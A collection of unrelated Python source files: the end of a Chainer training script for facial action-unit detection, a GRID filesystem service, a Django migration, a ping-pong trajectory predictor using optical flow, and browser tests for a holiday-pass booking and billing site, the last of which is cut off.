        description='train script of Time-axis R-CNN:')
    parser.add_argument('--pid', '-pp', default='/tmp/SpaceTime_AU_R_CNN/')
    parser.add_argument('--gpu', '-g', type=int, help='GPU ID')
    parser.add_argument('--lr', '-l', type=float, default=0.0001)
    parser.add_argument('--out', '-o', default='output_time_axis_rcnn',
                        help='Output directory')
    parser.add_argument('--database', default='BP4D',
                        help='Output directory: BP4D/DISFA/BP4D_DISFA')
    parser.add_argument('--iteration', '-i', type=int, default=70000)
    parser.add_argument('--optimizer', type=OptimizerType, choices=list(OptimizerType))
    parser.add_argument('--epoch', '-e', type=int, default=20)
    parser.add_argument('--batch_size', '-bs', type=int, default=1)
    parser.add_argument('--feature_dim', type=int, default=2048)
    parser.add_argument('--roi_size', type=int, default=7)
    parser.add_argument('--snapshot', '-snap', type=int, default=5)
    parser.add_argument("--fold", '-fd', type=int, default=3)
    parser.add_argument('--two_stream_mode', type=TwoStreamMode, choices=list(TwoStreamMode),
                        help='rgb_flow/ optical_flow/ rgb')
    parser.add_argument("--faster_backbone", type=FasterBackboneType, choices=list(FasterBackboneType), help='tcn/conv1d')
    parser.add_argument("--data_dir", type=str, default="/extract_features")
    parser.add_argument("--conv_layers", type=int, default=10)
    parser.add_argument("--split_idx", '-sp', type=int, default=1)
    parser.add_argument("--use_paper_num_label", action="store_true", help="only to use paper reported number of labels"
                                                                           " to train")
    parser.add_argument("--proc_num", "-proc", type=int, default=1)
    args = parser.parse_args()
    args.data_dir = config.ROOT_PATH + "/" + args.data_dir
    os.makedirs(args.pid, exist_ok=True)
    os.makedirs(args.out, exist_ok=True)

    # Record this process's PID so external scripts can manage the job.
    pid = str(os.getpid())
    pid_file_path = args.pid + os.path.sep + "{0}_{1}_fold_{2}.pid".format(args.database, args.fold, args.split_idx)
    with open(pid_file_path, "w") as file_obj:
        file_obj.write(pid)
        file_obj.flush()

    print('GPU: {}'.format(args.gpu))
    adaptive_AU_database(args.database)
    paper_report_label, class_num = squeeze_label_num_report(args.database, args.use_paper_num_label)
    paper_report_label_idx = list(paper_report_label.keys())

    # Choose the 1-D feature backbone implementation.
    if args.faster_backbone == FasterBackboneType.tcn:
        Bone = TcnBackbone
    elif args.faster_backbone == FasterBackboneType.conv1d:
        Bone = FasterBackbone

    if args.two_stream_mode == TwoStreamMode.rgb or args.two_stream_mode == TwoStreamMode.optical_flow:
        faster_extractor_backbone = Bone(args.conv_layers, args.feature_dim, 1024)
        faster_head_module = FasterHeadModule(args.feature_dim, class_num + 1, args.roi_size)  # note that the class number here must include background
        initialW = chainer.initializers.Normal(0.001)
        spn = SegmentProposalNetwork(1024, n_anchors=len(config.ANCHOR_SIZE), initialW=initialW)
        train_chain = TimeSegmentRCNNTrainChain(faster_extractor_backbone, faster_head_module, spn)
        model = Wrapper(train_chain, two_stream_mode=args.two_stream_mode)
    elif args.two_stream_mode == TwoStreamMode.rgb_flow:
        # NOTE(review): currently identical to the single-stream branch — the
        # separate optical-flow train chain was never finished (dead commented
        # code removed); the Wrapper dispatches on two_stream_mode.
        faster_extractor_backbone = Bone(args.conv_layers, args.feature_dim, 1024)
        faster_head_module = FasterHeadModule(args.feature_dim, class_num + 1,
                                              args.roi_size)  # note that the class number here must include background
        initialW = chainer.initializers.Normal(0.001)
        spn = SegmentProposalNetwork(1024, n_anchors=len(config.ANCHOR_SIZE), initialW=initialW)
        train_chain = TimeSegmentRCNNTrainChain(faster_extractor_backbone, faster_head_module, spn)
        model = Wrapper(train_chain, two_stream_mode=args.two_stream_mode)

    if args.gpu >= 0:
        model.to_gpu(args.gpu)
        chainer.cuda.get_device(args.gpu).use()

    # Build the optimizer requested on the command line.
    optimizer = None
    if args.optimizer == OptimizerType.AdaGrad:
        optimizer = chainer.optimizers.AdaGrad(
            lr=args.lr)  # originally MomentumSGD(lr=args.lr, momentum=0.9); switched to AdaGrad because the loss became NaN
    elif args.optimizer == OptimizerType.RMSprop:
        optimizer = chainer.optimizers.RMSprop(lr=args.lr)
    elif args.optimizer == OptimizerType.Adam:
        optimizer = chainer.optimizers.Adam(alpha=args.lr)
    elif args.optimizer == OptimizerType.SGD:
        optimizer = chainer.optimizers.MomentumSGD(lr=args.lr, momentum=0.9)
    elif args.optimizer == OptimizerType.AdaDelta:
        optimizer = chainer.optimizers.AdaDelta()
    optimizer.setup(model)
    optimizer.add_hook(chainer.optimizer.WeightDecay(rate=0.0005))

    # Training dataset with random time-axis mirroring.
    data_dir = args.data_dir + "/{0}_{1}_fold_{2}/train".format(args.database, args.fold, args.split_idx)
    dataset = NpzFeatureDataset(data_dir, args.database, two_stream_mode=args.two_stream_mode, T=10.0, use_mirror_data=True)
    dataset = TransformDataset(dataset, Transform(mirror=True))
    if args.proc_num == 1:
        train_iter = SerialIterator(dataset, args.batch_size, repeat=True, shuffle=True)
    else:
        train_iter = MultiprocessIterator(dataset, batch_size=args.batch_size,
                                          n_processes=args.proc_num,
                                          repeat=True, shuffle=True, n_prefetch=10, shared_mem=10000000)

    use_paper_classnum = "use_paper_num_label" if args.use_paper_num_label else "all_avail_label"
    model_file_name = args.out + os.path.sep + \
        'time_axis_rcnn_{0}_{1}_fold_{2}@{3}@{4}@{5}@{6}_model.npz'.format(args.database,
                                                                           args.fold, args.split_idx,
                                                                           use_paper_classnum, args.two_stream_mode,
                                                                           args.conv_layers, args.faster_backbone)
    print(model_file_name)
    pretrained_optimizer_file_name = args.out + os.path.sep + \
        'time_axis_rcnn_{0}_{1}_fold_{2}@{3}@{4}@{5}@{6}_optimizer.npz'.format(args.database,
                                                                               args.fold, args.split_idx,
                                                                               use_paper_classnum, args.two_stream_mode,
                                                                               args.conv_layers, args.faster_backbone)
    print(pretrained_optimizer_file_name)

    # Resume from earlier snapshots when present.
    if os.path.exists(pretrained_optimizer_file_name):
        print("loading optimizer snatshot:{}".format(pretrained_optimizer_file_name))
        chainer.serializers.load_npz(pretrained_optimizer_file_name, optimizer)
    if os.path.exists(model_file_name):
        print("loading pretrained snapshot:{}".format(model_file_name))
        chainer.serializers.load_npz(model_file_name, model.time_seg_train_chain)

    print("only one GPU({0}) updater".format(args.gpu))
    updater = chainer.training.StandardUpdater(train_iter, optimizer, device=args.gpu,
                                               converter=lambda batch, device: concat_examples_not_string(batch, device, padding=0))
    trainer = training.Trainer(
        updater, (args.epoch, 'epoch'), out=args.out)
    trainer.extend(
        chainer.training.extensions.snapshot_object(optimizer, filename=os.path.basename(pretrained_optimizer_file_name)),
        trigger=(args.snapshot, 'epoch'))
    trainer.extend(
        chainer.training.extensions.snapshot_object(model.time_seg_train_chain,
                                                    filename=os.path.basename(model_file_name)),
        trigger=(args.snapshot, 'epoch'))

    log_interval = 100, 'iteration'
    print_interval = 100, 'iteration'
    plot_interval = 100, 'iteration'
    # BUG FIX: args.optimizer is an OptimizerType enum (see the optimizer
    # construction above), so the original comparisons against the strings
    # "Adam"/"AdaDelta" never matched for a plain Enum; compare enum members.
    if args.optimizer != OptimizerType.Adam and args.optimizer != OptimizerType.AdaDelta:
        trainer.extend(chainer.training.extensions.ExponentialShift('lr', 0.1),
                       trigger=(20, 'epoch'))
    elif args.optimizer == OptimizerType.Adam:
        trainer.extend(chainer.training.extensions.ExponentialShift("alpha", 0.1, optimizer=optimizer), trigger=(10, 'epoch'))
    if args.optimizer != OptimizerType.AdaDelta:
        # AdaDelta has no lr attribute to observe.
        trainer.extend(chainer.training.extensions.observe_lr(),
                       trigger=log_interval)

    trainer.extend(chainer.training.extensions.LogReport(trigger=log_interval, log_name="log_{0}_{1}_{2}_fold_{3}_{4}.log".format(args.faster_backbone,
                                                                                                                                  args.database, args.fold, args.split_idx,
                                                                                                                                  use_paper_classnum)))
    trainer.extend(chainer.training.extensions.PrintReport(
        ['iteration', 'epoch', 'elapsed_time', 'lr',
         'main/loss', 'main/roi_loc_loss',
         'main/roi_cls_loss',
         'main/rpn_loc_loss',
         'main/rpn_cls_loss',
         'main/accuracy',
         'main/rpn_accuracy',
         ]), trigger=print_interval)
    trainer.extend(chainer.training.extensions.ProgressBar(update_interval=100))

    if chainer.training.extensions.PlotReport.available():
        trainer.extend(
            chainer.training.extensions.PlotReport(
                ['main/loss'],
                file_name='loss_{0}_{1}_fold_{2}_{3}.png'.format(args.database, args.fold, args.split_idx,
                                                                 use_paper_classnum), trigger=plot_interval
            ),
            trigger=plot_interval
        )
        trainer.extend(
            chainer.training.extensions.PlotReport(
                ['main/accuracy'],
                file_name='accuracy_{0}_{1}_fold_{2}_{3}.png'.format(args.database, args.fold, args.split_idx,
                                                                     use_paper_classnum), trigger=plot_interval
            ),
            trigger=plot_interval
        )
    trainer.run()
# Script entry point.
if __name__ == '__main__':
    main()
|
from saga.exceptions import DoesNotExist
from lib.exception.file_exists_exception import FileExistsException
import saga
class FilesystemService:
    """Service for performing filesystem operations on GRID.

    Implemented on top of the Saga library; the concrete file/directory
    classes are injected so they can be substituted in tests.
    """

    def __init__(self, file_class=saga.filesystem.File,
                 dir_class=saga.filesystem.Directory):
        """Create a new FilesystemService instance.

        :param file_class: Class for performing operations on remote files.
        :param dir_class: Class for performing operations on remote directories.
        """
        self._file = file_class
        self._dir = dir_class

    def copy_and_overwrite(self, sources, dst):
        """Copy files to *dst* (file or directory), overwriting if present.

        :param sources: List of files to be copied.
        :param dst: Destination to which files will be copied.
        """
        for src in sources:
            self._copy_file(src, dst)

    def copy(self, sources, dst):
        """Copy files to *dst*; raises FileExistsException on any clash.

        :param sources: List of files to be copied.
        :param dst: Destination (file or directory) to copy to.
        """
        if self._is_directory(dst):
            self._copy_to_directory(sources, dst)
        else:
            self._copy_to_file(sources, dst)

    def remove(self, files):
        """Recursively remove each listed file.

        :param files: List of files to be removed.
        """
        for target in files:
            self._file(target).remove(saga.filesystem.RECURSIVE)

    def cat_to_file(self, sources, destination):
        """Concatenate *sources* and write the result to *destination*.

        :param sources: List of files to concatenate.
        :param destination: File to which the result will be written.
        """
        merged = self._concatenate_sources(sources)
        sink = self._open_file(destination)
        sink.write(merged)
        sink.close()

    def cat(self, sources):
        """Return the concatenated contents of *sources*.

        :param sources: List of files to concatenate.
        """
        return self._concatenate_sources(sources)

    def list_dir(self, directory_path):
        """Return the paths contained in *directory_path*.

        :param directory_path: Path to a directory.
        """
        return [entry.path for entry in self._dir_content(directory_path)]

    def _open_file(self, path):
        # Open an existing file, or create it when missing.
        if self._file_exists(path):
            return self._file(path)
        return self._create_file(path)

    def _concatenate_sources(self, sources):
        # Join once instead of quadratic string +=.
        chunks = []
        for src in sources:
            chunks.append(self._read_file(self._file(src)))
        return "".join(chunks)

    def _create_file(self, path):
        return self._file(path, flags=saga.filesystem.CREATE)

    def _is_directory(self, path):
        # A missing path is treated as "not a directory".
        if not self._file_exists(path):
            return False
        return not self._file(path).is_file()

    def _copy_to_file(self, sources, dst):
        for src in sources:
            if self._will_overwrite_file(src, dst):
                raise FileExistsException
            self._copy_file(src, dst)

    def _will_overwrite_file(self, src, dst):
        return self._file_exists(dst)

    def _copy_to_directory(self, sources, dst):
        existing = self._dir_content(dst)
        for src in sources:
            if self._file_exists_in_directory(src, existing):
                raise FileExistsException
            self._copy_file(src, dst)

    def _copy_file(self, src, dst):
        self._file(src).copy(dst)

    def _dir_content(self, path):
        return self._dir(path).list()

    def _file_name(self, file):
        # Basename: everything after the last slash.
        return file.split("/")[-1]

    def _file_exists_in_directory(self, file_path, dir_content):
        wanted = self._file_name(file_path)
        return any(entry.path == wanted for entry in dir_content)

    def _file_exists(self, path):
        try:
            self._file(path)
        except DoesNotExist:
            return False
        return True

    def _read_file(self, f):
        # Workaround for Saga-Python issue #314: the first read may fail or
        # return bad data, so read twice and retry once on IOError.
        try:
            content = f.read()
            content = f.read()
        except IOError:
            content = f.read()
        return content
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-16 22:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration: creates the Region and Constellation tables and
    links Constellation.regionID to Region with CASCADE delete."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Constellation: integer PK, indexed name, center (x, y, z) and
        # bounding-box floats, optional factionID/radius.
        migrations.CreateModel(
            name='Constellation',
            fields=[
                ('constellationID', models.IntegerField(primary_key=True, serialize=False)),
                ('constellationName', models.CharField(db_index=True, max_length=100)),
                ('x', models.FloatField()),
                ('y', models.FloatField()),
                ('z', models.FloatField()),
                ('xMax', models.FloatField()),
                ('xMin', models.FloatField()),
                ('yMax', models.FloatField()),
                ('yMin', models.FloatField()),
                ('zMax', models.FloatField()),
                ('zMin', models.FloatField()),
                ('factionID', models.IntegerField(null=True)),
                ('radius', models.IntegerField(null=True)),
            ],
        ),
        # Region: same shape as Constellation.
        migrations.CreateModel(
            name='Region',
            fields=[
                ('regionID', models.IntegerField(primary_key=True, serialize=False)),
                ('regionName', models.CharField(db_index=True, max_length=100)),
                ('x', models.FloatField()),
                ('y', models.FloatField()),
                ('z', models.FloatField()),
                ('xMax', models.FloatField()),
                ('xMin', models.FloatField()),
                ('yMax', models.FloatField()),
                ('yMin', models.FloatField()),
                ('zMax', models.FloatField()),
                ('zMin', models.FloatField()),
                ('factionID', models.IntegerField(null=True)),
                ('radius', models.IntegerField(null=True)),
            ],
        ),
        # Added after both CreateModels so the FK target already exists.
        migrations.AddField(
            model_name='constellation',
            name='regionID',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='evesde.Region'),
        ),
    ]
|
""" Utility program for project ball-ping-pong
This program takes a video of players playing ping pong (the players need
not be visible in the frame) and predicts the trajectory of the ball,
with only partial frames of the video. The basic idea is to run
optical flow over two adjacent (or close-in-time) frames to estimate
a velocity vector, and compute a curve (parabola for now) based
on the velocity as a function of time.
For usage of this program, run "python3 main.py -h"
args:
video: Path to the video that has a ping pong ball moving.
start: Start time to used for prediction, also adopted as the start of trajectory.
duration: How long the trajectory is in terms of time.
optional args:
delta: An integer such that the delta-th frame after the start frame is used
as the second frame of optical flow. Defaults to 1.
"""
import argparse
from datetime import time
import numpy as np
import cv2
from PIL import Image
import time as ctime
import locate_ball
import VelocityUtils
# gravity in pixel/sec. need tuning for different camera Orz.
#base_ng = 0.0036 # (for rvid)
base_ng = 0.00215 # or 0.0024 (for vid)
#base_ng = 0.0014
def compute_trajectory(p, v, ng, h=0.0):
    """Build the degree-2 trajectory polynomials x(t) and y(t).

    p: position/pose (p_x, p_y)
    v: velocity (v_x, v_y) (pixel/frame)
    ng: gravity (pixel/frame^2)
    h: frame offset of (p, v) relative to t=0; shifts the parabola so it
       passes through p at t=h instead of t=0.
    Returns the pair (x(t), y(t)) as numpy Polynomial objects.
    """
    Poly = np.polynomial.polynomial.Polynomial
    x_coeffs = (p[0]-(v[0] * h), v[0])
    y_coeffs = (p[1]-(v[1] * h)+(h*h*ng/2), v[1]-(2*h*ng/2), ng/2)
    return Poly(x_coeffs), Poly(y_coeffs)
def extract_background(vidpath):
    """Estimate the static background of a video.

    Takes the per-pixel median over 25 randomly chosen frames, which
    suppresses the moving ball/players and keeps the static scene.

    :param vidpath: path to the video file.
    :return: uint8 BGR image of the estimated background.
    """
    cap = cv2.VideoCapture(vidpath)
    # Randomly select 25 frame positions across the whole video
    frameIds = cap.get(cv2.CAP_PROP_FRAME_COUNT) * np.random.uniform(size=25)
    # Store selected frames in an array
    frames = []
    for fid in frameIds:
        cap.set(cv2.CAP_PROP_POS_FRAMES, fid)
        ret, frame = cap.read()
        # Bug fix: the original appended the frame unconditionally, so a
        # failed read put None into the list and crashed np.median.
        if ret:
            frames.append(frame)
    # Bug fix: release the capture handle (the original leaked it).
    cap.release()
    # Calculate the median along the time axis
    medianFrame = np.median(frames, axis=0).astype(dtype=np.uint8)
    return medianFrame
if __name__ == '__main__':
    cmd_parser = argparse.ArgumentParser()
    cmd_parser.add_argument("video", help="path to video of ball movement")
    cmd_parser.add_argument("--start", help="time to start drawing the trajectory and used for prediction (in ISO format)", default="00:00:00")
    cmd_parser.add_argument("--duration", help="duration of the trajectory to predict (in ISO format)", default="00:00:03")
    cmd_parser.add_argument("--delta", type=int, choices=range(1,11), help="frame difference for optical flow", default=1)
    args = cmd_parser.parse_args()
    # Read background image.
    # If not found, preprocess video and
    # store it for later (cached as <video>_background.jpg).
    vidname = args.video[:args.video.rfind('.')]
    background = cv2.imread(vidname + "_background.jpg")
    if background is None:
        background = extract_background(args.video)
        cv2.imwrite(vidname + "_background.jpg", background)
    cap = cv2.VideoCapture(args.video)
    # get info about video
    frame_rate = cap.get(cv2.CAP_PROP_FPS)
    total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT)
    vid_width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
    vid_height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
    print(f'frame rate: {frame_rate}')
    print(f'total frames: {total_frames}')
    print(f'frame size: {int(vid_width)} x {int(vid_height)}')
    start, duration = None, None
    # additional processing to validate arguments
    try:
        start = time.fromisoformat(args.start)
    except ValueError:
        raise ValueError("argument \"start\" not specified in appropriate format. maybe try ISO format?")
    # calculate corresponding frame id at time start
    start_sec = start.hour * 3600 + start.minute * 60 + start.second + start.microsecond / 1000000.0
    start_frame = int(np.ceil(start_sec / (1.0 / frame_rate)))
    # check start in video (leaving delta frames of headroom), else raise error
    if start_frame < 0 or start_frame >= total_frames - args.delta:
        raise ValueError("start time out of bound")
    start_frame += 1
    try:
        duration = time.fromisoformat(args.duration)
    except ValueError:
        raise ValueError("argument \"duration\" not specified in appropriate format. maybe try ISO format?")
    duration_sec = duration.hour * 3600 + duration.minute * 60 + duration.second + duration.microsecond / 1000000.0
    duration_frames = int(np.ceil(duration_sec / (1.0 / frame_rate)))
    end_frame = start_frame + duration_frames
    # check end_frame is within the video
    if end_frame > total_frames:
        end_frame = total_frames
    # calculate delta frames after start_frame
    delta_frame = start_frame + args.delta
    print(f'process frame at {start_frame} and {delta_frame}')
    print(f'draw trajectory to frame {end_frame}')
    # input parsing ends here
    # (start_frame, end_frame, delta_frame are frame indices)
    # Step 1. play the video until start frame (ESC = 27 aborts playback)
    frame_interval = 1.0 / frame_rate
    curr_frame = 0
    frame1 = None
    while curr_frame < start_frame:
        curr_frame += 1
        ret, frame1 = cap.read()
        cv2.imshow("output", frame1)
        k = cv2.waitKey(int(frame_interval * 1000)) & 0xff
        if k == 27:
            break
    assert int(cap.get(cv2.CAP_PROP_POS_FRAMES)) == curr_frame
    cv2.imwrite("frame1.jpg", frame1)
    cv2.imshow("output", frame1)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    # Step 2. get initial position(s) of the ball. unit is pixel
    # (background subtraction isolates moving objects before detection)
    filtered_frame = cv2.subtract(frame1, background)
    ball_position = locate_ball.locate_ball(frame1, filtered_frame, viz=True)
    assert ball_position is not None
    print('ball position:', ball_position)
    # Create a mask image for drawing purposes
    mask = np.zeros_like(frame1)
    p0 = np.array([[ball_position]], dtype=np.float32)
    old_gray = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
    required_frames = [frame1]
    # Main playback loop: collect frames until delta_frame, then predict
    # and draw the trajectory once, and keep tracking the ball afterwards.
    while True:
        curr_frame += 1
        ret, frame = cap.read()
        if not ret:  # no more frames
            print("Video ended.")
            break
        if curr_frame <= delta_frame:
            required_frames.append(frame)
        if curr_frame == delta_frame:
            assert int(cap.get(cv2.CAP_PROP_POS_FRAMES)) == delta_frame
            assert len(required_frames) == args.delta + 1
            # now have frames for prediction,
            # so draw trajectory before proceeding
            frame2 = frame
            # frame1 and frame2 are two images for prediction.
            # frame1 is the image of start_frame
            # and frame2 the image of delta_frame
            # MAIN TASK HERE:
            # get velocity at start frame. unit is pixel/frame
            # (8 sample points on a radius-10 circle around the ball)
            angles = np.linspace(0, 2*np.pi, num=8, endpoint=False)
            dx = 10 * np.cos(angles)
            dy = 10 * np.sin(angles)
            dx += ball_position[0]
            dy += ball_position[1]
            track_points = np.stack((dx, dy)).T.tolist()
            print(track_points)
            #track_points = [ball_position]
            if args.delta == 1:
                velocity = VelocityUtils.with_LK_optical_flow(frame1, frame2, track_points)
                #velocity = VelocityUtils.with_FB_optical_flow(frame1, frame2, track_points)
                print(f'velocity = {velocity}')
            else:
                # try velocities at multiple frames
                velocities = VelocityUtils.with_LK_optical_flow_N(required_frames, track_points)
                velocity = velocities[0]
            # (TEMPORARY) visualize the first velocity
            v = np.array(velocity)
            v = v * 10  # scale velocity for drawing
            c, d = ball_position[0], ball_position[1]
            mask = cv2.line(mask, (int(c), int(d)), (int(c+v[0]), int(d+v[1])), (0, 0, 255), 2)
            frame1 = cv2.circle(frame1, (int(c), int(d)), 5, (255,255,0), -1)
            # compute traj prediction from velocity
            if args.delta == 1:
                traj_x, traj_y = compute_trajectory(ball_position, velocity, base_ng / frame_interval)
            else:
                # average the parabolas fitted from each per-frame velocity
                traj_x, traj_y = compute_trajectory(ball_position, velocities[0], base_ng / frame_interval)
                pos = np.array(ball_position) + velocities[0]
                for i in range(1, len(velocities)):
                    traj_xi, traj_yi = compute_trajectory(pos, velocities[i], base_ng / frame_interval, h=i)
                    traj_x += traj_xi
                    traj_y += traj_yi
                    pos += velocities[i]
                traj_x /= len(velocities)
                traj_y /= len(velocities)
            traj_interval = end_frame - start_frame + 1
            end_x = np.floor(traj_x(traj_interval))
            start_x = np.rint(ball_position[0])
            # rasterize x positions in the direction of travel
            if end_x > start_x:
                xs = np.arange(start_x, end_x+1)
            else:
                xs = np.arange(start_x, end_x-1, -1)
            ts = (xs - start_x) / velocity[0]
            ys = traj_y(ts)
            # draw prediction
            xs = xs.astype(int)
            ys = np.rint(ys).astype(int)
            for i in range(1, xs.shape[0]):
                mask = cv2.line(mask, (xs[i-1], ys[i-1]), (xs[i], ys[i]), (0,0,255), 2)
            img = cv2.add(frame2, mask)
            cv2.imshow('output', img)
            cv2.waitKey(0)
            cv2.destroyAllWindows()
        # keep playing video with drawn prediction,
        # and also draw ball track
        frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # optical flow for tracking
        p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **(VelocityUtils.lk_params))
        good_new = p1[st==1]
        good_old = p0[st==1]
        old, new = good_old[0], good_new[0]
        a,b = new.ravel()
        c,d = old.ravel()
        mask = cv2.line(mask, (a,b),(c,d), (255,255,255), 2)
        frame = cv2.circle(frame, (a,b), 5, (255,255,0), -1)
        img = cv2.add(frame, mask)
        cv2.imshow('output', img)
        k = cv2.waitKey(int(frame_interval * 1000)) & 0xff
        if k == 27:
            break
        # Now update the previous frame and previous points
        p0 = good_new.reshape(-1,1,2)
        old_gray = frame_gray.copy()
    cv2.waitKey(0)
    cv2.destroyAllWindows()
|
import time
import json
import pytest
from datetime import timedelta
from psycopg2.extras import NumericRange
from pytest import mark
from sedate import as_datetime, replace_timezone
@mark.flaky(reruns=3)
def test_browse_matching(browser, scenario):
    """Browser walk of /matching: run the automatic matching, inspect the
    per-occasion details, reset it, then run and confirm it for good."""
    scenario.add_period(title="Ferienpass 2016")
    # two activities, each with one occasion taking 2-4 attendees
    for i in range(2):
        scenario.add_activity(title=f"A {i}", state='accepted')
        scenario.add_occasion(age=(0, 10), spots=(2, 4))
    dustin = scenario.add_attendee(name="Dustin")
    mike = scenario.add_attendee(name="Mike")
    # the first course has enough attendees
    scenario.add_booking(attendee=dustin, occasion=scenario.occasions[0])
    scenario.add_booking(attendee=mike, occasion=scenario.occasions[0])
    # the second one does not
    scenario.add_booking(attendee=mike, occasion=scenario.occasions[1])
    scenario.commit()
    browser.login_admin()
    browser.visit('/matching')
    # check the initial state
    assert browser.is_text_present("Ferienpass 2016")
    assert browser.is_text_present("Zufriedenheit liegt bei 0%")
    assert browser.is_text_present("0% aller Durchführungen haben genügend")
    assert browser.is_text_present("0 / 4")
    # run a matching
    browser.find_by_value("Zuteilung ausführen").click()
    # check the results
    assert browser.is_text_present("Zufriedenheit liegt bei 100%")
    assert browser.is_text_present("50% aller Durchführungen haben genügend")
    assert browser.is_text_present("1 / 4")
    assert browser.is_text_present("2 / 4")
    # try to toggle some details
    assert not browser.is_text_present("Dustin")
    assert not browser.is_text_present("Mike")
    browser.find_by_css('.matching-details > button')[0].click()
    browser.is_element_visible_by_css('.matches')
    assert browser.is_text_present("Dustin")
    assert browser.is_text_present("Mike")
    # reset it again
    browser.find_by_css('.reset-matching').click()
    # without this we sometimes get errors (lets the async reset settle)
    time.sleep(0.25)
    # confirm the matching
    assert browser.is_text_present("Zufriedenheit liegt bei 0%")
    assert browser.is_text_present("0% aller Durchführungen haben genügend")
    browser.find_by_css('input[value="yes"]').click()
    browser.find_by_css('input[name="sure"]').click()
    browser.find_by_value("Zuteilung ausführen").click()
    assert browser.is_text_present("wurde bereits bestätigt")
    # verify the period's state
    browser.visit('/periods')
    assert 'finished prebooking' in browser.html
def test_browse_billing(browser, scenario, postgres):
    """Browser walk of /billing: create bills, check invoice visibility
    before/after finalizing the period, pay in steps, and add/remove a
    manual booking (using postgres save/undo to branch scenarios)."""
    scenario.add_period(title="Ferienpass 2016", confirmed=True)
    scenario.add_activity(title="Foobar", state='accepted')
    scenario.add_user(username='member@example.org', role='member')
    scenario.c.users.by_username('admin@example.org').realname = 'Jane Doe'
    scenario.c.users.by_username('member@example.org').realname = 'John Doe'
    scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=100)
    scenario.add_occasion(age=(0, 10), spots=(0, 2), cost=1000)
    scenario.add_attendee(name="Dustin")
    # admin: one accepted (billed) and one cancelled (not billed) booking
    scenario.add_booking(
        username='admin@example.org',
        occasion=scenario.occasions[0],
        state='accepted',
        cost=100
    )
    scenario.add_booking(
        username='admin@example.org',
        occasion=scenario.occasions[1],
        state='cancelled',
        cost=1000
    )
    scenario.add_attendee(name="Mike")
    # member: both bookings accepted -> billed 1100 in total
    scenario.add_booking(
        username='member@example.org',
        occasion=scenario.occasions[0],
        state='accepted',
        cost=100
    )
    scenario.add_booking(
        username='member@example.org',
        occasion=scenario.occasions[1],
        state='accepted',
        cost=1000
    )
    scenario.commit()
    browser.login_admin()
    # initially there are no bills
    browser.visit('/billing')
    assert browser.is_text_present("Keine Rechnungen gefunden")
    # they can be created
    browser.find_by_css("input[type='submit']").click()
    assert browser.is_text_present("John Doe")
    assert browser.is_text_present("Jane Doe")
    # as long as the period is not finalized, there's no way to pay
    browser.visit('/billing?username=admin@example.org')
    assert browser.is_text_present('100.00 Ausstehend')
    browser.visit('/billing?username=member@example.org')
    assert browser.is_text_present('1100.00 Ausstehend')
    assert 'mark-paid' not in browser.html
    # as long as the period is not finalized, there are no invoices
    browser.logout()
    browser.login('member@example.org', 'hunter2')
    browser.visit('/')
    assert browser.find_by_css('.invoices-count').first['data-count'] == '0'
    browser.visit('/my-bills')
    assert browser.is_text_present("noch keine Rechnungen")
    browser.logout()
    browser.login_admin()
    browser.visit('/')
    assert browser.find_by_css('.invoices-count').first['data-count'] == '0'
    browser.visit('/my-bills')
    assert browser.is_text_present("noch keine Rechnungen")
    # once the period is finalized, the invoices become public and they
    # may be marked as paid
    browser.visit('/billing')
    browser.find_by_css('input[value="yes"]').click()
    browser.find_by_css('input[name="sure"]').click()
    browser.find_by_css("input[type='submit']").click()
    browser.logout()
    browser.login('member@example.org', 'hunter2')
    browser.visit('/')
    assert browser.find_by_css('.invoices-count').first['data-count'] == '1'
    browser.visit('/my-bills')
    assert not browser.is_text_present('noch keine Rechnungen')
    assert browser.is_text_present("Ferienpass 2016")
    browser.logout()
    browser.login_admin()
    browser.visit('/')
    assert browser.find_by_css('.invoices-count').first['data-count'] == '1'
    browser.visit('/my-bills')
    assert not browser.is_text_present('noch keine Rechnungen')
    assert browser.is_text_present("Ferienpass 2016")
    browser.visit('/billing?username=member@example.org&state=all')
    assert browser.is_text_present('1100.00 Ausstehend')
    # we'll test a few scenarios here (snapshot the DB to branch from)
    postgres.save()
    # pay the bill bit by bit
    assert not browser.is_element_present_by_css('.paid')
    browser.find_by_css('.bill button').click()
    browser.find_by_css('table .unpaid .actions-button').first.click()
    browser.find_by_css('table .unpaid .mark-paid').first.click()
    time.sleep(0.25)
    assert browser.is_element_present_by_css('.paid')
    assert browser.is_element_present_by_css('.unpaid')
    browser.find_by_css('table .unpaid .actions-button').first.click()
    browser.find_by_css('table .unpaid .mark-paid').first.click()
    time.sleep(0.25)
    assert browser.is_element_present_by_css('.paid')
    assert not browser.is_element_present_by_css('.unpaid')
    # try to introduce a manual booking (back on the saved snapshot)
    postgres.undo()
    browser.visit('/billing?state=all')
    browser.find_by_css('.dropdown.right-side').click()
    browser.find_by_css('.new-booking').click()
    browser.choose('target', 'all')
    browser.choose('kind', 'discount')
    browser.find_by_css('#booking_text').fill('Rabatt')
    browser.find_by_css('#discount').fill('1.00')
    browser.find_by_value("Absenden").click()
    assert browser.is_text_present("2 manuelle Buchungen wurden erstellt")
    assert browser.is_element_present_by_css('.remove-manual')
    # remove the manual booking
    browser.find_by_css('.dropdown.right-side').click()
    browser.find_by_css('.remove-manual').click()
    assert browser.is_text_present("2 Buchungen entfernen")
    browser.find_by_text("2 Buchungen entfernen").click()
    time.sleep(0.25)
    assert not browser.is_element_present_by_css('.remove-manual')
# The parametrization is used to ensure all the volunteer states can
# be reached by clicking in the browser and verify that the states
# can be exported properly
@pytest.mark.parametrize('to_volunteer_state', [
    ('Kontaktiert'),
    ('Bestätigt'),
    ('Offen'),
])
def test_volunteers_export(browser, scenario, to_volunteer_state):
    """Enable the volunteer feature, register a volunteer, move it to the
    parametrized state, and compare the JSON export entry field by field."""
    scenario.add_period(title="Ferienpass 2019", active=True, confirmed=True)
    scenario.add_activity(title="Zoo", state='accepted')
    scenario.add_user(username='member@example.org', role='member')
